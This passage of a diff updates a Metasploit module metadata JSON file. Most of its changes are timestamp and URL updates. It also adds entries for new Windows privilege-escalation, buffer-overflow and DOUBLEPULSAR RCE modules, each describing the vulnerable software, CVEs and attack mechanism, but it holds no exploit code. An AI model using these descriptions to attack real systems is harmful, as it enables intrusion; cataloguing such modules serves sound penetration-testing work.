     "path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ms10_038_excel_obj_bof",
@@ -110592,7 +110708,7 @@
       "Microsoft Office Excel 2007 on Windows XP",
       "Microsoft Office Excel 2007 SP2 on Windows XP"
     ],
-    "mod_time": "2017-09-22 18:49:09 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ms11_021_xlb_bof",
@@ -110715,7 +110831,7 @@
       "MSB-MS13-071",
       "BID-62176",
       "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell"
+      "URL-https://blog.rapid7.com/2013/09/25/change-the-theme-get-a-shell"
     ],
     "platform": "Windows",
     "arch": "",
@@ -110729,7 +110845,7 @@
     "targets": [
       "Windows XP SP3 / Windows 2003 SP2"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ms13_071_theme",
@@ -111040,7 +111156,7 @@
     "targets": [
       "Windows XP SP2 English"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ms_visual_basic_vbp",
@@ -111124,7 +111240,7 @@
     "targets": [
       "Windows XP SP2-SP3 IE 7.0"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/msworks_wkspictureinterface",
@@ -111167,7 +111283,7 @@
       "Windows Universal (SEH)",
       "Windows XP SP3 French"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/mymp3player_m3u",
@@ -111207,7 +111323,7 @@
     "targets": [
       "Windows XP SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/netop.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/netop",
@@ -111589,7 +111705,7 @@
     "targets": [
       "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/openoffice_ole.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/openoffice_ole",
@@ -111761,7 +111877,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/proshow_cellimage_bof",
@@ -112021,7 +112137,7 @@
       "WinSrv 2000 SP2 English",
       "WinSrv 2003 Enterprise Edition SP1 (v1023) English"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/safenet_softremote_groupname",
@@ -112062,7 +112178,7 @@
     "targets": [
       "Windows XP SP3 / IE 7"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/sascam_get.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/sascam_get",
@@ -112147,7 +112263,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/shadow_stream_recorder_bof",
@@ -112228,7 +112344,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/somplplayer_m3u",
@@ -112310,7 +112426,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2018-01-23 16:34:49 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/syncbreeze_xml",
@@ -112570,7 +112686,7 @@
     "targets": [
       "Windows XP SP0"
     ],
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ursoft_w32dasm",
@@ -112614,7 +112730,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/varicad_dwb.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/varicad_dwb",
@@ -112787,7 +112903,7 @@
       "Visio 2002 English on Windows XP SP3 Spanish",
       "Visio 2002 English on Windows XP SP3 English"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/visio_dxf_bof",
@@ -113086,7 +113202,7 @@
     "targets": [
       "VUPlayer 2.49"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/vuplayer_cue",
@@ -113126,7 +113242,7 @@
     "targets": [
       "VUPlayer 2.49"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/vuplayer_m3u",
@@ -113434,7 +113550,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/wm_downloader_m3u",
@@ -113477,7 +113593,7 @@
     "targets": [
       "Windows XP SP2 / SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/xenorate_xpl_bof",
@@ -113564,7 +113680,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/xradio_xrl_sehbof",
@@ -115856,7 +115972,7 @@
     "targets": [
       "Windows XP SP3 / Windows Vista"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/ftp/scriptftp_list.rb",
     "is_install_path": true,
     "ref_name": "windows/ftp/scriptftp_list",
@@ -120683,7 +120799,7 @@
     ],
     "description": "This module exploits a command injection vulnerability\n        discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n        and 11.30). The vulnerability exists in the DNS Tool allowing an\n        attacker to execute arbitrary commands in the context of the service. By\n        default, HP SiteScope installs and runs as SYSTEM in Windows and does\n        not require authentication. This vulnerability only exists on the\n        Windows version. The Linux version is unaffected.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
+      "URL-https://blog.rapid7.com/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
       "URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html"
     ],
     "platform": "Windows",
@@ -120708,7 +120824,7 @@
       "HP SiteScope 11.30 / Microsoft Windows 7 and higher",
       "HP SiteScope 11.30 / CMD"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb",
     "is_install_path": true,
     "ref_name": "windows/http/hp_sitescope_dns_tool",
@@ -121899,7 +122015,7 @@
     ],
     "description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n        uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n        ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n        inject a null bye at the end of the value to create a malicious file with an arbitrary\n        file type, and then place it under a directory that allows server-side scripts to run,\n        which results in remote code execution under the context of SYSTEM.\n\n        Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n        but older ones run on port 8040. Also, using this exploit will leave debugging information\n        produced by FileUploadServlet in file rdslog0.txt.\n\n        This exploit was successfully tested on version 9, build 90109 and build 91084.",
     "references": [
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
+      "URL-https://blog.rapid7.com/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
       "CVE-2015-8249"
     ],
     "platform": "Windows",
@@ -121923,7 +122039,7 @@
     "targets": [
       "ManageEngine Desktop Central 9 on Windows"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb",
     "is_install_path": true,
     "ref_name": "windows/http/manageengine_connectionid_write",
@@ -127996,7 +128112,7 @@
     "targets": [
       "Windows x64"
     ],
-    "mod_time": "2018-07-27 11:35:31 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/local/mov_ss.rb",
     "is_install_path": true,
     "ref_name": "windows/local/mov_ss",
@@ -128726,7 +128842,7 @@
     "targets": [
       "Windows 7 SP1"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/local/ms16_016_webdav.rb",
     "is_install_path": true,
     "ref_name": "windows/local/ms16_016_webdav",
@@ -128771,7 +128887,7 @@
       "Windows x86",
       "Windows x64"
     ],
-    "mod_time": "2019-07-09 17:36:28 +0000",
+    "mod_time": "2020-01-29 17:11:07 +0000",
     "path": "/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb",
     "is_install_path": true,
     "ref_name": "windows/local/ms16_032_secondary_logon_handle_privesc",
@@ -129224,7 +129340,7 @@
     "targets": [
       "Windows"
     ],
-    "mod_time": "2019-12-12 15:20:51 +0000",
+    "mod_time": "2019-12-18 16:06:26 +0000",
     "path": "/modules/exploits/windows/local/payload_inject.rb",
     "is_install_path": true,
     "ref_name": "windows/local/payload_inject",
@@ -129264,7 +129380,7 @@
     "targets": [
       "Windows"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/local/persistence.rb",
     "is_install_path": true,
     "ref_name": "windows/local/persistence",
@@ -129305,7 +129421,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-11-16 04:58:02 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb",
     "is_install_path": true,
     "ref_name": "windows/local/persistence_image_exec_options",
@@ -129355,6 +129471,54 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/local/plantronics_hub_spokesupdateservice_privesc": {
+    "name": "Plantronics Hub SpokesUpdateService Privilege Escalation",
+    "fullname": "exploit/windows/local/plantronics_hub_spokesupdateservice_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-30",
+    "type": "exploit",
+    "author": [
+      "Markus Krell",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "The Plantronics Hub client application for Windows makes use of an\n        automatic update service `SpokesUpdateService.exe` which automatically\n        executes a file specified in the `MajorUpgrade.config` configuration\n        file as SYSTEM. The configuration file is writable by all users by default.\n\n        This module has been tested successfully on Plantronics Hub version 3.13.2\n        on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2019-15742",
+      "EDB-47845",
+      "URL-https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-03 20:32:01 +0000",
+    "path": "/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/plantronics_hub_spokesupdateservice_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_windows/local/powershell_cmd_upgrade": {
     "name": "Windows Command Shell Upgrade (Powershell)",
     "fullname": "exploit/windows/local/powershell_cmd_upgrade",
@@ -129679,7 +129843,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-03-29 18:14:56 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/local/registry_persistence.rb",
     "is_install_path": true,
     "ref_name": "windows/local/registry_persistence",
@@ -129690,6 +129854,57 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/local/ricoh_driver_privesc": {
+    "name": "Ricoh Driver Privilege Escalation",
+    "fullname": "exploit/windows/local/ricoh_driver_privesc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-01-22",
+    "type": "exploit",
+    "author": [
+      "Alexander Pudwill",
+      "Pentagrid AG",
+      "Shelby Pace"
+    ],
+    "description": "Various Ricoh printer drivers allow escalation of\n        privileges on Windows systems.\n\n        For vulnerable drivers, a low-privileged user can\n        read/write files within the `RICOH_DRV` directory\n        and its subdirectories.\n\n        `PrintIsolationHost.exe`, a Windows process running\n        as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n        during the installation of a printer. A user can\n        elevate to SYSTEM by writing a malicious DLL to\n        the vulnerable driver directory and adding a new\n        printer with a vulnerable driver.\n\n        This module leverages the `prnmngr.vbs` script\n        to add and delete printers. Multiple runs of this\n        module may be required given successful exploitation\n        is time-sensitive.",
+    "references": [
+      "CVE-2019-19363",
+      "URL-https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2020-02-06 14:11:42 +0000",
+    "path": "/modules/exploits/windows/local/ricoh_driver_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/ricoh_driver_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "service-resource-loss"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_windows/local/run_as": {
     "name": "Windows Run Command As User",
     "fullname": "exploit/windows/local/run_as",
@@ -130017,6 +130232,54 @@
     },
     "needs_cleanup": true
   },
+  "exploit_windows/local/windscribe_windscribeservice_priv_esc": {
+    "name": "Windscribe WindscribeService Named Pipe Privilege Escalation",
+    "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-05-24",
+    "type": "exploit",
+    "author": [
+      "Emin Ghuliev",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "The Windscribe VPN client application for Windows makes use of a\n        Windows service `WindscribeService.exe` which exposes a named pipe\n        `\\.\\pipe\\WindscribeService` allowing execution of programs with\n        elevated privileges.\n\n        Windscribe versions prior to 1.82 do not validate user-supplied\n        program names, allowing execution of arbitrary commands as SYSTEM.\n\n        This module has been tested successfully on Windscribe versions\n        1.80 and 1.81 on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2018-11479",
+      "URL-http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html",
+      "URL-https://pastebin.com/eLG3dpYK"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-02-01 00:41:07 +0000",
+    "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/windscribe_windscribeservice_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_windows/local/wmi": {
     "name": "Windows Management Instrumentation (WMI) Remote Command Execution",
     "fullname": "exploit/windows/local/wmi",
@@ -130087,7 +130350,7 @@
     "targets": [
       "Windows"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/local/wmi_persistence.rb",
     "is_install_path": true,
     "ref_name": "windows/local/wmi_persistence",
@@ -131719,6 +131982,50 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/misc/crosschex_device_bof": {
+    "name": "Anviz CrossChex Buffer Overflow",
+    "fullname": "exploit/windows/misc/crosschex_device_bof",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-11-28",
+    "type": "exploit",
+    "author": [
+      "Luis Catarino <lcatarino@protonmail.com>",
+      "Pedro Rodrigues <pedrosousarodrigues@protonmail.com>",
+      "agalway-r7",
+      "adfoster-r7"
+    ],
+    "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n        triggering a stack buffer overflow.",
+    "references": [
+      "CVE-2019-12518",
+      "URL-https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html",
+      "EDB-47734"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Crosschex Standard x86 <= V4.3.12"
+    ],
+    "mod_time": "2020-02-18 23:18:45 +0000",
+    "path": "/modules/exploits/windows/misc/crosschex_device_bof.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/crosschex_device_bof",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/misc/disk_savvy_adm": {
     "name": "Disk Savvy Enterprise v10.4.18",
     "fullname": "exploit/windows/misc/disk_savvy_adm",
@@ -132543,7 +132850,7 @@
       "CVE-2012-0124",
       "OSVDB-80105",
       "BID-52431",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
+      "URL-https://blog.rapid7.com/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
     ],
     "platform": "Windows",
     "arch": "",
@@ -132558,7 +132865,7 @@
       "HP Data Protector Express 6.0.00.11974 / Windows XP SP3",
       "HP Data Protector Express 5.0.00.59287 / Windows XP SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb",
     "is_install_path": true,
     "ref_name": "windows/misc/hp_dataprotector_new_folder",
@@ -135679,7 +135986,7 @@
     "targets": [
       "MySQL on Windows"
     ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
     "is_install_path": true,
     "ref_name": "windows/mysql/mysql_start_up",
@@ -135887,7 +136194,7 @@
     "references": [
       "CVE-2012-4959",
       "OSVDB-87573",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
     ],
     "platform": "Windows",
     "arch": "",
@@ -135910,7 +136217,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb",
     "is_install_path": true,
     "ref_name": "windows/novell/file_reporter_fsfui_upload",
@@ -136935,6 +137242,63 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/rdp/rdp_doublepulsar_rce": {
+    "name": "RDP DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/rdp/rdp_doublepulsar_rce",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Tom Sellers",
+      "Spencer McIntyre"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for RDP.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "URL-https://github.com/countercept/doublepulsar-detection-script"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 3389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-01-29 13:16:02 +0000",
+    "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/rdp/rdp_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "exploit/windows/smb/smb_doublepulsar_rce"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/scada/abb_wserver_exec": {
     "name": "ABB MicroSCADA wserver.exe Remote Code Execution",
     "fullname": "exploit/windows/scada/abb_wserver_exec",
@@ -137209,7 +137573,7 @@
       "CoDeSys v2.3 on Windows XP SP3",
       "CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/scada/codesys_web_server.rb",
     "is_install_path": true,
     "ref_name": "windows/scada/codesys_web_server",
@@ -138300,7 +138664,7 @@
     "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n        exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.",
     "references": [
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
       "CVE-2014-0784"
     ],
     "platform": "Windows",
@@ -138315,7 +138679,7 @@
     "targets": [
       "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/scada/yokogawa_bkbcopyd_bof",
@@ -138342,7 +138706,7 @@
     "description": "This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability\n        exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n        insecure usage of memcpy, using attacker controlled data as the size count. This module\n        has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n        2003 SP2.",
     "references": [
       "CVE-2014-0782",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf"
     ],
     "platform": "Windows",
@@ -138357,7 +138721,7 @@
     "targets": [
       "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/scada/yokogawa_bkesimmgr_bof",
@@ -138386,7 +138750,7 @@
       "CVE-2014-3888",
       "URL-http://jvn.jp/vu/JVNVU95045914/index.html",
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
+      "URL-https://blog.rapid7.com/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
     ],
     "platform": "Windows",
     "arch": "",
@@ -138400,7 +138764,7 @@
     "targets": [
       "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3"
     ],
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb",
     "is_install_path": true,
     "ref_name": "windows/scada/yokogawa_bkfsim_vhfd",
@@ -138427,7 +138791,7 @@
     "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n        exists in the service BKHOdeq.exe when handling specially crafted packets. This module has\n        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n        2003 SP2.",
     "references": [
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
       "CVE-2014-0783"
     ],
     "platform": "Windows",
@@ -138442,7 +138806,7 @@
     "targets": [
       "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/scada/yokogawa_bkhodeq_bof",
@@ -138576,78 +138940,6 @@
     },
     "needs_cleanup": null
   },
-  "exploit_windows/smb/doublepulsar_rce": {
-    "name": "DOUBLEPULSAR Payload Execution and Neutralization",
-    "fullname": "exploit/windows/smb/doublepulsar_rce",
-    "aliases": [
-
-    ],
-    "rank": 500,
-    "disclosure_date": "2017-04-14",
-    "type": "exploit",
-    "author": [
-      "Equation Group",
-      "Shadow Brokers",
-      "zerosum0x0",
-      "Luke Jennings",
-      "wvu <wvu@metasploit.com>",
-      "Jacob Robles"
-    ],
-    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
-    "references": [
-      "MSB-MS17-010",
-      "CVE-2017-0143",
-      "CVE-2017-0144",
-      "CVE-2017-0145",
-      "CVE-2017-0146",
-      "CVE-2017-0147",
-      "CVE-2017-0148",
-      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
